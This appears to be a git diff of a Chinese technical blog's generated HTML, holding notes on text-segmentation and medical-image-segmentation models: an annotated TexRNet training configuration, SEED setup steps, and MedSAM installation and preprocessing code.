      # 使用多进程方式进行测试,设置 nprocs 为 GPU_COUNT 即可利用 GPU 并行加速测试过程。
      # 最后,join=True 表示程序会一直阻塞在这里,直到所有进程都完成并退出后才会继续往下执行
      mp.spawn(tester,
      args=(),
      nprocs=cfg.GPU_COUNT,
      join=True)

      开跑时,会显示各种参数的情况:

      -
      {'COMPUTER_NAME': 'OMEN',  // 电脑名称
      'CUDA': True, // CUDA 是否可用
      'DATA': {'ALIGN_CORNERS': True, // 是否对齐图像的四个角
      'CLASS_NAME': ['background', 'text'], // 类别名称。在本例中,有两类分别为'background'和'text'
      'CLASS_NUM': 2, // 类别数量
      'DATASET_MODE': 'train+val', // 数据集模式。在本例中,是训练数据集和验证数据集结合在一起使用
      'DATASET_NAME': 'textseg', // 数据集名称,在本例中为'textseg'
      'EFFECTIVE_CLASS_NUM': 2, // 有效的类别数量
      'FORMATTER': 'SemChinsChbbxFormatter', // 数据格式化器的名称,在本例中为'SemChinsChbbxFormatter'
      'IGNORE_LABEL': 999, // 忽略的标签值,在本例中为 999
      'IM_MEAN': [0.485, 0.456, 0.406], // 图像各个通道的均值
      'IM_STD': [0.229, 0.224, 0.225], // 图像各个通道的标准差
      'LOADER_DERIVED_CLS_MAP_TO': 'bg', // 加载程序映射的类名
      'LOADER_PIPELINE': ['NumpyImageLoader', // 加载数据的处理流程
      'TextSeg_SeglabelLoader',
      'CharBboxSpLoader'],
      'LOADER_SQUARE_BBOX': True, // 是否在加载时将字符的 bbox 转换为正方形
      'LOAD_BACKEND_IMAGE': 'pil', // 读取图像的库名称
      'LOAD_IS_MC_IMAGE': False, // 是否是多通道图像
      'LOAD_IS_MC_SEGLABEL': True, // 加载的标签是否是多通道的
      'NUM_WORKERS': 5, // 加载数据的线程数
      'NUM_WORKERS_PER_GPU': 5, // 每个 GPU 上加载数据的线程数
      'RANDOM_CROP_FILL': {'image': [0, 0, 0], 'seglabel': [999]}, // 对图像进行随机 crop 时需要填充的内容
      'RANDOM_CROP_PADDING_MODE': 'random', // 填充模式,在本例中为'random'
      'RANDOM_CROP_SIZE': [513, 513], // 进行随机 crop 时输出的尺寸大小
      'RANDOM_RESIZE_CROP_FROM': 'sem', // 将 semantic label resize 到指定大小后再进行随机 crop
      'RANDOM_RESIZE_CROP_RATIO': [0.75, 1.3333333333333333], // 进行 resize 时的纵横比范围
      'RANDOM_RESIZE_CROP_SCALE': [0.8, 1.2], // 进行 resize 时的缩放比例范围
      'RANDOM_RESIZE_CROP_SIZE': [32, 32], // 在进行 resize 前需要保证 semantic label 的最小尺寸大小
      'RANDOM_SCALE_ONESIDE_ALIGN_CORNERS': True, // 是否对齐图像的四个角
      'RANDOM_SCALE_ONESIDE_DIM': 'shortside', // 进行缩放的维度,在本例中为长边
      'RANDOM_SCALE_ONESIDE_RANGE': [513, 1025], // 进行缩放时的尺寸范围
      'ROOT_DIR': 'D:\\Study\\XXX\\TextSeg', // 数据集所在目录
      'SEGLABEL_IGNORE_LABEL': 999, // 忽略的标签值,在本例中为 999
      'SEMANTIC_PICK_CLASS': 'all', // 要选择的语义类别,在本例中为'all'
      'TRANS_PIPELINE': ['UniformNumpyType', // 图像的预处理流程
      'TextSeg_RandomResizeCropCharBbox',
      'NormalizeUint8ToZeroOne',
      'Normalize',
      'RandomScaleOneSide',
      'RandomCrop'],
      'TRY_SAMPLE': None}, // 尝试样本的数量
      'DEBUG': False, // 是否开启调试模式
      'DIST_BACKEND': 'gloo', // 分布式训练的后端,本例中为'gloo'
      'DIST_URL': 'tcp://127.0.0.1:11233', // 分布式训练的 URL
      'EXPERIMENT_ID': 168471973979, // 实验的 ID
      'GPU_COUNT': 1, // 使用的 GPU 数量
      'GPU_DEVICE': [0], // 使用的 GPU 编号
      'LOG_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet', // 日志存储的目录路径
      'LOG_FILE': 'D:\\Study\\XXXX\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet\\train.log', // 日志输出的文件路径
      'MAINLOOP_EXECUTE': True, // 是否执行主循环
      'MAIN_CODE': ['main.py', 'train_utils.py', 'eval_utils.py'], // 主要的代码文件
      'MAIN_CODE_PATH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation', // 代码所在的路径
      'MATPLOTLIB_MODE': 'Agg', // Matplotlib 模式
      'MISC_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log', // 杂项文件的存储目录路径
      // 模型的配置文件,包含了 HRNet 模型的距离参数和结构
      'MODEL': {'HRNET': {'ALIGN_CORNERS': True, // 是否使用 align_corners 参数对齐角点
      'BN_MOMENTUM': 'hardcoded to 0.1', // Batch Normalization 层的动量
      'FINAL_CONV_KERNEL': 1, // 最终卷积核的大小
      'IGNORE_LABEL': 999, // 忽略标签的数值
      'INTRAIN_GETPRED': False, // 是否在训练时计算预测结果
      'LOSS_TYPE': 'ce', // 使用的损失函数类型
      'MODEL_TAGS': ['v0', 'base'], // 模型标签
      'OUTPUT_CHANNEL_NUM': 720, // 模型输出通道数
      'PRETRAINED_PTH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\pretrained\\init\\hrnetv2_w48_imagenet_pretrained.pth.base', // 预训练模型的路径
      'STAGE1_PARA': {'BLOCK': 'BOTTLENECK', // HRNet 中所使用的块的类型
      'FUSE_METHOD': 'SUM', // HRNet 的每个分支上进行特征融合的方法
      'NUM_BLOCKS': [4], // 每个分支中块的数量
      'NUM_BRANCHES': 1, // 使用的分支数
      'NUM_CHANNELS': [64], // 每个分支的通道数
      'NUM_MODULES': 1}, // 使用的模块数
      'STAGE2_PARA': {'BLOCK': 'BASIC',
      'FUSE_METHOD': 'SUM',
      'NUM_BLOCKS': [4, 4],
      'NUM_BRANCHES': 2,
      'NUM_CHANNELS': [48, 96],
      'NUM_MODULES': 1},
      'STAGE3_PARA': {'BLOCK': 'BASIC',
      'FUSE_METHOD': 'SUM',
      'NUM_BLOCKS': [4, 4, 4],
      'NUM_BRANCHES': 3,
      'NUM_CHANNELS': [48, 96, 192],
      'NUM_MODULES': 4},
      'STAGE4_PARA': {'BLOCK': 'BASIC',
      'FUSE_METHOD': 'SUM',
      'NUM_BLOCKS': [4, 4, 4, 4],
      'NUM_BRANCHES': 4,
      'NUM_CHANNELS': [48, 96, 192, 384],
      'NUM_MODULES': 3}},
      'MODEL_NAME': 'texrnet', // 模型名称
      'TEXRNET': {'ALIGN_CORNERS': True, // 是否使用 align_corners 参数对齐角点
      'BIAS_ATTENTION_TYPE': 'cossim', // 偏置注意力的类型
      'BN_TYPE': 'bn', // Batch Normalization 层的类型
      'CONV_TYPE': 'conv', // 卷积层的类型
      'INIT_BIAS_ATTENTION_WITH': None, // 哪个注意力层进行初始化偏置注意力
      'INPUT_CHANNEL_NUM': 720, // 输入 Tensor 的通道数
      'INTRAIN_GETPRED_FROM': 'sem', // 在训练时计算预测结果的来源。此处为'sem',表示来自语义分割
      'MODEL_TAGS': ['hrnet'], // 模型标签
      'PRETRAINED_PTH': None, // 预训练模型的路径
      'REFINEMENT_CHANNEL_NUM': [725, 64, 64], // 精细化模块中各层输出通道数
      'REFINEMENT_LOSS_TYPE': {'lossrfn': 'ce', // 精细化模块中各损失函数类型
      'lossrfntri': 'trimapce'},
      'RELU_TYPE': 'relu', // ReLU 激活函数的类型
      'SEMANTIC_CLASS_NUM': 2, // 语义分割的类别数
      'SEMANTIC_IGNORE_LABEL': 999, // 语义分割中被忽略的标签
      'SEMANTIC_LOSS_TYPE': 'ce'}}, // 语义分割中使用的损失函数类型
      'RND_RECORDING': False, // 是否记录随机数生成器的状态
      'RND_SEED': 2, // 随机数种子
      'SAVE_CODE': True, // 是否保存代码
      'TORCH_VERSION': '1.13.1+cu117', // 使用的 PyTorch 版本号
      'TRAIN': {'ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER': 0, // 在第几次迭代后为分割模型激活分类器
      'ACTIVATE_REFINEMENT_AT_ITER': 0, // 在第几次迭代后激活精细化模块
      'BATCH_SIZE': 5, // 每个 GPU 上的 batch 大小
      'BATCH_SIZE_PER_GPU': 5,
      'CKPT_EVERY': inf, // 每多少 epoch 保存一次模型权重
      'CLASSIFIER_PATH': 'pretrained\\init\\resnet50_textcls.pth', // 分类器的路径
      'COMMENT': '>>>>later<<<<', // 训练过程中的注释信息
      'DISPLAY': 10, // 每隔多少次迭代输出一次日志信息
      'LOSS_WEIGHT': {'losscls': 0.1, // 不同损失函数的权重
      'lossrfn': 0.5,
      'lossrfntri': 0.5,
      'losssem': 1},
      'LOSS_WEIGHT_NORMALIZED': False, // 是否使用归一化的损失权重
      'LR_BASE': 0.01, // 学习率的基础值
      'LR_ITER_BY': 'iter', // 学习率的迭代方式。此处为'iter',表示按照迭代次数更新学习率
      'LR_TYPE': [('linear', 0, 0.01, 500), ('ploy', 0.01, 0, 20000, 0.9)], // 学习率的更新方式。包含了两种类型:'linear'和'ploy'
      'MAX_STEP': 20500, // 最大迭代次数或 epoch 数
      'MAX_STEP_TYPE': 'iter', // 最大迭代次数或 epoch 数的类型。此处为'iter',表示按照迭代次数来计算。
      'OPTIMIZER': 'sgd', // 优化器的类型。此处为'sgd',表示随机梯度下降法
      'OPTIM_MANAGER_LRSCALE': {'hrnet': 1, 'texrnet': 10}, // 不同模型在优化器中学习率的比例。包含了'texrnet'和'hrnet'两个键,分别对应不同模型
      'OVERFIT_A_BATCH': False, // 是否以一个 batch 进行过拟合实验
      'ROI_ALIGN_SIZE': [32, 32], // 表示 Region of Interest (ROI) Align 的大小
      'ROI_BBOX_PADDING_TYPE': 'semcrop', // 表示 ROI Align 时的填充类型
      'SAVE_CODE': True, // 是否保存代码
      'SAVE_INIT_MODEL': True, // 是否保存初始化模型
      'SGD_MOMENTUM': 0.9, // SGD 优化器的动量
      'SGD_WEIGHT_DECAY': 0.0005, // SGD 优化器的权重衰减因子
      'SIGNATURE': ['texrnet', 'hrnet'], // 模型签名
      'SKIP_PARTIAL': True, // 是否跳过部分数据
      'UPDATE_CLASSIFIER': False, // 是否更新分类器参数
      'USE_OPTIM_MANAGER': True, // 是否使用优化器管理器
      'VISUAL': False}} // 是否可视化
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      81
      82
      83
      84
      85
      86
      87
      88
      89
      90
      91
      92
      93
      94
      95
      96
      97
      98
      99
      100
      101
      102
      103
      104
      105
      106
      107
      108
      109
      110
      111
      112
      113
      114
      115
      116
      117
      118
      119
      120
      121
      122
      123
      124
      125
      126
      127
      128
      129
      130
      131
      132
      133
      134
      135
      136
      137
      138
      139
      140
      141
      142
      {'COMPUTER_NAME': 'OMEN',  // 电脑名称
      'CUDA': True, // CUDA 是否可用
      'DATA': {'ALIGN_CORNERS': True, // 是否对齐图像的四个角
      'CLASS_NAME': ['background', 'text'], // 类别名称。在本例中,有两类分别为'background'和'text'
      'CLASS_NUM': 2, // 类别数量
      'DATASET_MODE': 'train+val', // 数据集模式。在本例中,是训练数据集和验证数据集结合在一起使用
      'DATASET_NAME': 'textseg', // 数据集名称,在本例中为'textseg'
      'EFFECTIVE_CLASS_NUM': 2, // 有效的类别数量
      'FORMATTER': 'SemChinsChbbxFormatter', // 数据格式化器的名称,在本例中为'SemChinsChbbxFormatter'
      'IGNORE_LABEL': 999, // 忽略的标签值,在本例中为 999
      'IM_MEAN': [0.485, 0.456, 0.406], // 图像各个通道的均值
      'IM_STD': [0.229, 0.224, 0.225], // 图像各个通道的标准差
      'LOADER_DERIVED_CLS_MAP_TO': 'bg', // 加载程序映射的类名
      'LOADER_PIPELINE': ['NumpyImageLoader', // 加载数据的处理流程
      'TextSeg_SeglabelLoader',
      'CharBboxSpLoader'],
      'LOADER_SQUARE_BBOX': True, // 是否在加载时将字符的 bbox 转换为正方形
      'LOAD_BACKEND_IMAGE': 'pil', // 读取图像的库名称
      'LOAD_IS_MC_IMAGE': False, // 是否是多通道图像
      'LOAD_IS_MC_SEGLABEL': True, // 加载的标签是否是多通道的
      'NUM_WORKERS': 5, // 加载数据的线程数
      'NUM_WORKERS_PER_GPU': 5, // 每个 GPU 上加载数据的线程数
      'RANDOM_CROP_FILL': {'image': [0, 0, 0], 'seglabel': [999]}, // 对图像进行随机 crop 时需要填充的内容
      'RANDOM_CROP_PADDING_MODE': 'random', // 填充模式,在本例中为'random'
      'RANDOM_CROP_SIZE': [513, 513], // 进行随机 crop 时输出的尺寸大小
      'RANDOM_RESIZE_CROP_FROM': 'sem', // 将 semantic label resize 到指定大小后再进行随机 crop
      'RANDOM_RESIZE_CROP_RATIO': [0.75, 1.3333333333333333], // 进行 resize 时的纵横比范围
      'RANDOM_RESIZE_CROP_SCALE': [0.8, 1.2], // 进行 resize 时的缩放比例范围
      'RANDOM_RESIZE_CROP_SIZE': [32, 32], // 在进行 resize 前需要保证 semantic label 的最小尺寸大小
      'RANDOM_SCALE_ONESIDE_ALIGN_CORNERS': True, // 是否对齐图像的四个角
      'RANDOM_SCALE_ONESIDE_DIM': 'shortside', // 进行缩放的维度,在本例中为长边
      'RANDOM_SCALE_ONESIDE_RANGE': [513, 1025], // 进行缩放时的尺寸范围
      'ROOT_DIR': 'D:\\Study\\XXX\\TextSeg', // 数据集所在目录
      'SEGLABEL_IGNORE_LABEL': 999, // 忽略的标签值,在本例中为 999
      'SEMANTIC_PICK_CLASS': 'all', // 要选择的语义类别,在本例中为'all'
      'TRANS_PIPELINE': ['UniformNumpyType', // 图像的预处理流程
      'TextSeg_RandomResizeCropCharBbox',
      'NormalizeUint8ToZeroOne',
      'Normalize',
      'RandomScaleOneSide',
      'RandomCrop'],
      'TRY_SAMPLE': None}, // 尝试样本的数量
      'DEBUG': False, // 是否开启调试模式
      'DIST_BACKEND': 'gloo', // 分布式训练的后端,本例中为'gloo'
      'DIST_URL': 'tcp://127.0.0.1:11233', // 分布式训练的 URL
      'EXPERIMENT_ID': 168471973979, // 实验的 ID
      'GPU_COUNT': 1, // 使用的 GPU 数量
      'GPU_DEVICE': [0], // 使用的 GPU 编号
      'LOG_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet', // 日志存储的目录路径
      'LOG_FILE': 'D:\\Study\\XXXX\Rethinking-Text-Segmentation\\log\\texrnet_textseg\\168471973979_texrnet_hrnet\\train.log', // 日志输出的文件路径
      'MAINLOOP_EXECUTE': True, // 是否执行主循环
      'MAIN_CODE': ['main.py', 'train_utils.py', 'eval_utils.py'], // 主要的代码文件
      'MAIN_CODE_PATH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation', // 代码所在的路径
      'MATPLOTLIB_MODE': 'Agg', // Matplotlib 模式
      'MISC_DIR': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\log', // 杂项文件的存储目录路径
      // 模型的配置文件,包含了 HRNet 模型的距离参数和结构
      'MODEL': {'HRNET': {'ALIGN_CORNERS': True, // 是否使用 align_corners 参数对齐角点
      'BN_MOMENTUM': 'hardcoded to 0.1', // Batch Normalization 层的动量
      'FINAL_CONV_KERNEL': 1, // 最终卷积核的大小
      'IGNORE_LABEL': 999, // 忽略标签的数值
      'INTRAIN_GETPRED': False, // 是否在训练时计算预测结果
      'LOSS_TYPE': 'ce', // 使用的损失函数类型
      'MODEL_TAGS': ['v0', 'base'], // 模型标签
      'OUTPUT_CHANNEL_NUM': 720, // 模型输出通道数
      'PRETRAINED_PTH': 'D:\\Study\\XXXX\\Rethinking-Text-Segmentation\\pretrained\\init\\hrnetv2_w48_imagenet_pretrained.pth.base', // 预训练模型的路径
      'STAGE1_PARA': {'BLOCK': 'BOTTLENECK', // HRNet 中所使用的块的类型
      'FUSE_METHOD': 'SUM', // HRNet 的每个分支上进行特征融合的方法
      'NUM_BLOCKS': [4], // 每个分支中块的数量
      'NUM_BRANCHES': 1, // 使用的分支数
      'NUM_CHANNELS': [64], // 每个分支的通道数
      'NUM_MODULES': 1}, // 使用的模块数
      'STAGE2_PARA': {'BLOCK': 'BASIC',
      'FUSE_METHOD': 'SUM',
      'NUM_BLOCKS': [4, 4],
      'NUM_BRANCHES': 2,
      'NUM_CHANNELS': [48, 96],
      'NUM_MODULES': 1},
      'STAGE3_PARA': {'BLOCK': 'BASIC',
      'FUSE_METHOD': 'SUM',
      'NUM_BLOCKS': [4, 4, 4],
      'NUM_BRANCHES': 3,
      'NUM_CHANNELS': [48, 96, 192],
      'NUM_MODULES': 4},
      'STAGE4_PARA': {'BLOCK': 'BASIC',
      'FUSE_METHOD': 'SUM',
      'NUM_BLOCKS': [4, 4, 4, 4],
      'NUM_BRANCHES': 4,
      'NUM_CHANNELS': [48, 96, 192, 384],
      'NUM_MODULES': 3}},
      'MODEL_NAME': 'texrnet', // 模型名称
      'TEXRNET': {'ALIGN_CORNERS': True, // 是否使用 align_corners 参数对齐角点
      'BIAS_ATTENTION_TYPE': 'cossim', // 偏置注意力的类型
      'BN_TYPE': 'bn', // Batch Normalization 层的类型
      'CONV_TYPE': 'conv', // 卷积层的类型
      'INIT_BIAS_ATTENTION_WITH': None, // 哪个注意力层进行初始化偏置注意力
      'INPUT_CHANNEL_NUM': 720, // 输入 Tensor 的通道数
      'INTRAIN_GETPRED_FROM': 'sem', // 在训练时计算预测结果的来源。此处为'sem',表示来自语义分割
      'MODEL_TAGS': ['hrnet'], // 模型标签
      'PRETRAINED_PTH': None, // 预训练模型的路径
      'REFINEMENT_CHANNEL_NUM': [725, 64, 64], // 精细化模块中各层输出通道数
      'REFINEMENT_LOSS_TYPE': {'lossrfn': 'ce', // 精细化模块中各损失函数类型
      'lossrfntri': 'trimapce'},
      'RELU_TYPE': 'relu', // ReLU 激活函数的类型
      'SEMANTIC_CLASS_NUM': 2, // 语义分割的类别数
      'SEMANTIC_IGNORE_LABEL': 999, // 语义分割中被忽略的标签
      'SEMANTIC_LOSS_TYPE': 'ce'}}, // 语义分割中使用的损失函数类型
      'RND_RECORDING': False, // 是否记录随机数生成器的状态
      'RND_SEED': 2, // 随机数种子
      'SAVE_CODE': True, // 是否保存代码
      'TORCH_VERSION': '1.13.1+cu117', // 使用的 PyTorch 版本号
      'TRAIN': {'ACTIVATE_CLASSIFIER_FOR_SEGMODEL_AFTER': 0, // 在第几次迭代后为分割模型激活分类器
      'ACTIVATE_REFINEMENT_AT_ITER': 0, // 在第几次迭代后激活精细化模块
      'BATCH_SIZE': 5, // 每个 GPU 上的 batch 大小
      'BATCH_SIZE_PER_GPU': 5,
      'CKPT_EVERY': inf, // 每多少 epoch 保存一次模型权重
      'CLASSIFIER_PATH': 'pretrained\\init\\resnet50_textcls.pth', // 分类器的路径
      'COMMENT': '>>>>later<<<<', // 训练过程中的注释信息
      'DISPLAY': 10, // 每隔多少次迭代输出一次日志信息
      'LOSS_WEIGHT': {'losscls': 0.1, // 不同损失函数的权重
      'lossrfn': 0.5,
      'lossrfntri': 0.5,
      'losssem': 1},
      'LOSS_WEIGHT_NORMALIZED': False, // 是否使用归一化的损失权重
      'LR_BASE': 0.01, // 学习率的基础值
      'LR_ITER_BY': 'iter', // 学习率的迭代方式。此处为'iter',表示按照迭代次数更新学习率
      'LR_TYPE': [('linear', 0, 0.01, 500), ('ploy', 0.01, 0, 20000, 0.9)], // 学习率的更新方式。包含了两种类型:'linear'和'ploy'
      'MAX_STEP': 20500, // 最大迭代次数或 epoch 数
      'MAX_STEP_TYPE': 'iter', // 最大迭代次数或 epoch 数的类型。此处为'iter',表示按照迭代次数来计算。
      'OPTIMIZER': 'sgd', // 优化器的类型。此处为'sgd',表示随机梯度下降法
      'OPTIM_MANAGER_LRSCALE': {'hrnet': 1, 'texrnet': 10}, // 不同模型在优化器中学习率的比例。包含了'texrnet'和'hrnet'两个键,分别对应不同模型
      'OVERFIT_A_BATCH': False, // 是否以一个 batch 进行过拟合实验
      'ROI_ALIGN_SIZE': [32, 32], // 表示 Region of Interest (ROI) Align 的大小
      'ROI_BBOX_PADDING_TYPE': 'semcrop', // 表示 ROI Align 时的填充类型
      'SAVE_CODE': True, // 是否保存代码
      'SAVE_INIT_MODEL': True, // 是否保存初始化模型
      'SGD_MOMENTUM': 0.9, // SGD 优化器的动量
      'SGD_WEIGHT_DECAY': 0.0005, // SGD 优化器的权重衰减因子
      'SIGNATURE': ['texrnet', 'hrnet'], // 模型签名
      'SKIP_PARTIAL': True, // 是否跳过部分数据
      'UPDATE_CLASSIFIER': False, // 是否更新分类器参数
      'USE_OPTIM_MANAGER': True, // 是否使用优化器管理器
      'VISUAL': False}} // 是否可视化
      @@ -992,6 +990,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition/index.html b/posts/Paper-SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition/index.html index 29b8a126b0..9f44aceedc 100644 --- a/posts/Paper-SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition/index.html +++ b/posts/Paper-SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition/index.html @@ -44,8 +44,6 @@ - - @@ -756,9 +754,9 @@

      代码

      Pay20Y/SEED (github.com) 下载代码到系统上,把 requirement.txt 里关于 torch 的删了。

      png

      装!

      -
      pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
      +
      1
      pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

      中间会因为装 pycocotools 失败而寄,填之:

      -
      sudo apt-get install gcc build-essential
      +
      1
      sudo apt-get install gcc build-essential

      继续,然后装 scipy 会寄,从 requirement.txt 里删了它重新装直到没有报错。


      Word vectors for 157 languages · fastText 里下载下载预训练语言模型 cc.en.300.bin

      @@ -979,6 +977,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-SORDI.ai-large-scale synthetic object recognition dataset/index.html b/posts/Paper-SORDI.ai-large-scale synthetic object recognition dataset/index.html index fb204fe151..d67b8e6180 100644 --- a/posts/Paper-SORDI.ai-large-scale synthetic object recognition dataset/index.html +++ b/posts/Paper-SORDI.ai-large-scale synthetic object recognition dataset/index.html @@ -44,8 +44,6 @@ - - @@ -814,6 +812,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Segment Anything in Medical Images/index.html b/posts/Paper-Segment Anything in Medical Images/index.html index 12deccd50b..86d87fb702 100644 --- a/posts/Paper-Segment Anything in Medical Images/index.html +++ b/posts/Paper-Segment Anything in Medical Images/index.html @@ -44,8 +44,6 @@ - - @@ -511,9 +509,9 @@

      笔记

      代码

      配置

      新建一个 conda 环境:

      -
      conda create -n medsam python=3.10 -y
      +
      1
      conda create -n medsam python=3.10 -y

      激活之:

      -
      conda activate medsam
      +
      1
      conda activate medsam

      离线安装 pytorch:

      download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision

        @@ -522,16 +520,16 @@

        配置

      png

      安装之:

      -
      pip install torch-2.0.0+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
      -
      pip install torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
      +
      1
      pip install torch-2.0.0+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
      +
      1
      pip install torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

      下载仓库:bowang-lab/MedSAM:MedSAM:Segment Anything in Medical Images的官方存储库。 (github.com)

      在仓库文件夹下:

      -
      pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple
      +
      1
      pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple

      在自定义数据集上微调 SAM

      1. 打开 pre_CT.py ,查看里面 parser 都定义了什么玩意儿:
      -
      # set up the parser
      parser = argparse.ArgumentParser(description='preprocess CT images')
      parser.add_argument('-i', '--nii_path', type=str, default='data/FLARE22Train/images', help='path to the nii images')
      parser.add_argument('-gt', '--gt_path', type=str, default='data/FLARE22Train/labels', help='path to the ground truth',)
      parser.add_argument('-o', '--npz_path', type=str, default='data/Npz_files', help='path to save the npz files')

      parser.add_argument('--image_size', type=int, default=256, help='image size')
      parser.add_argument('--modality', type=str, default='CT', help='modality')
      parser.add_argument('--anatomy', type=str, default='Abd-Gallbladder', help='anatomy')
      parser.add_argument('--img_name_suffix', type=str, default='_0000.nii.gz', help='image name suffix')
      parser.add_argument('--label_id', type=int, default=9, help='label id')
      parser.add_argument('--prefix', type=str, default='CT_Abd-Gallbladder_', help='prefix')
      parser.add_argument('--model_type', type=str, default='vit_b', help='model type')
      parser.add_argument('--checkpoint', type=str, default='work_dir/SAM/sam_vit_b_01ec64.pth', help='checkpoint')
      parser.add_argument('--device', type=str, default='cuda:0', help='device')
      # seed
      parser.add_argument('--seed', type=int, default=2023, help='random seed')
      args = parser.parse_args()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      # set up the parser
      parser = argparse.ArgumentParser(description='preprocess CT images')
      parser.add_argument('-i', '--nii_path', type=str, default='data/FLARE22Train/images', help='path to the nii images')
      parser.add_argument('-gt', '--gt_path', type=str, default='data/FLARE22Train/labels', help='path to the ground truth',)
      parser.add_argument('-o', '--npz_path', type=str, default='data/Npz_files', help='path to save the npz files')

      parser.add_argument('--image_size', type=int, default=256, help='image size')
      parser.add_argument('--modality', type=str, default='CT', help='modality')
      parser.add_argument('--anatomy', type=str, default='Abd-Gallbladder', help='anatomy')
      parser.add_argument('--img_name_suffix', type=str, default='_0000.nii.gz', help='image name suffix')
      parser.add_argument('--label_id', type=int, default=9, help='label id')
      parser.add_argument('--prefix', type=str, default='CT_Abd-Gallbladder_', help='prefix')
      parser.add_argument('--model_type', type=str, default='vit_b', help='model type')
      parser.add_argument('--checkpoint', type=str, default='work_dir/SAM/sam_vit_b_01ec64.pth', help='checkpoint')
      parser.add_argument('--device', type=str, default='cuda:0', help='device')
      # seed
      parser.add_argument('--seed', type=int, default=2023, help='random seed')
      args = parser.parse_args()
      @@ -697,7 +695,7 @@

      2D

      png

      又遇俩坑,填填填:

      -
      pip install chardet
      pip install --force-reinstall charset-normalizer==3.1.0
      +
      1
      2
      pip install chardet
      pip install --force-reinstall charset-normalizer==3.1.0

      可以跑了!

      png

      看代码

      @@ -782,42 +780,42 @@

      set up the parse -
      # 获取 args.gt_path 目录下所有文件名,并按字典序排序,将结果赋值给 names
      names = sorted(os.listdir(args.gt_path))
      # 将 args.npz_path 和 args.model_type 拼接成一个新路径名 save_path
      save_path = args.npz_path + '_' + args.model_type
      # 创建新的目录save_path。如果该目录已经存在,则不做任何操作。如果不存在,则新建该目录及其所有上级目录
      os.makedirs(save_path, exist_ok=True)
      # 打印输出 names 列表的长度即图片数量
      print('image number:', len(names))
      +
      1
      2
      3
      4
      5
      6
      7
      8
      # 获取 args.gt_path 目录下所有文件名,并按字典序排序,将结果赋值给 names
      names = sorted(os.listdir(args.gt_path))
      # 将 args.npz_path 和 args.model_type 拼接成一个新路径名 save_path
      save_path = args.npz_path + '_' + args.model_type
      # 创建新的目录save_path。如果该目录已经存在,则不做任何操作。如果不存在,则新建该目录及其所有上级目录
      os.makedirs(save_path, exist_ok=True)
      # 打印输出 names 列表的长度即图片数量
      print('image number:', len(names))

      set up the model

      -
      # 初始化模型,设置好 args.model_type、args.checkpoint、args.device
      sam_model = sam_model_registry[args.model_type](checkpoint=args.checkpoint).to(args.device)
      +
      1
      2
      # 初始化模型,设置好 args.model_type、args.checkpoint、args.device
      sam_model = sam_model_registry[args.model_type](checkpoint=args.checkpoint).to(args.device)

      convert 2d grey or rgb images to npz file

      -
      imgs = []  # 图片(images)
      gts = [] # 标签(labels)
      img_embeddings = [] # 图片嵌入信息

      # 遍历 ground truth 文件夹, names 默认为 args.gt_path('data/MedSAMDemo_2D/train/labels')下排序好的文件列表
      for gt_name in tqdm(names):
      image_name = gt_name.split('.')[0] + args.img_name_suffix # 获得文件名称 + 后缀名
      gt_data = io.imread(join(args.gt_path, gt_name)) # 获得 ground truth 数据
      if len(gt_data.shape)==3: # 如果 gt_data 是三维的,则只取第一个通道(灰度图)
      gt_data = gt_data[:,:,0]
      assert len(gt_data.shape)==2, 'ground truth should be 2D' # 确保分割标签是二维的(高和宽)
      # 这行代码的作用是将分割标签(即 gt_data)缩放到指定大小(args.image_size),并将其值转换为二进制形式(0 和 1)。
      # 具体来说,它会将分割标签中所有等于 args.label_id 的像素点设置为 1,其余像素点设置为 0,然后将结果缩放到指定大小。
      # 这里使用了 scikit-image 库的 transform.resize 函数,
      # 并指定了 order=0 表示使用最近邻插值法,
      # preserve_range=True 表示保持输入图像的范围不变(即值仍在 0 到 1 之间),
      # mode='constant' 表示在缩放后填充常数值的方式为使用边界值填充。
      # 最终得到的结果是一个二值图像,即只包含 0 和 1 两种像素值的图像。
      gt_data = transform.resize(gt_data==args.label_id, (args.image_size, args.image_size), order=0, preserve_range=True, mode='constant')
      # 将gt_data值转换为 8 位无符号整数
      gt_data = np.uint8(gt_data)

